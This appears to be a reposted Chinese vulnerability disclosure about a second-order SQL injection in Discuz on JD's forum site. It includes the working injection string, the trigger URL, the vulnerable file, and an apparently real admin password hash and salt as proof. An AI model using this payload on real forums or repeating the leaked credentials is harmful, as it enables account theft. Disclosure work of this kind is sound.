详细说明:补丁不及时,京东论坛出现SQL注射。
http://bbs.360buy.com/
通过欺骗,GetShell等分析,可能渗透取得用户帐号信息。
Discuz1.5-2.0二次注入细节 www.2cto.com
在发表回复的地方输入注入语句:
a',`subject`=(/*!select*/ concat(username,'|',password,'|',salt) from pre_ucenter_members where uid=1 limit 0,1),comment='
然后到回复补充那里随便补充一下,注入语句就被执行。
补充的地址:
forum.php?mod=misc&tid={tid}&action=postappend&pid={pid}
上面的语句就会把取得的内容写进回复主题返回。
漏洞 文件:
source\module\forum\forum_misc.php
漏洞证明:x',`subject`=(/*!select*/ concat(username,'|',password,'|',salt) from bbs_uc_members where uid=1 limit 0,1),comment='
admin|9e41f2fe3adedef0385641b38d49952a|262264
修复方案:打补丁。
作者 Jannock@乌云
查看更多关于京东商场某分站SQL注射及修复方案 - 网站安全的详细内容...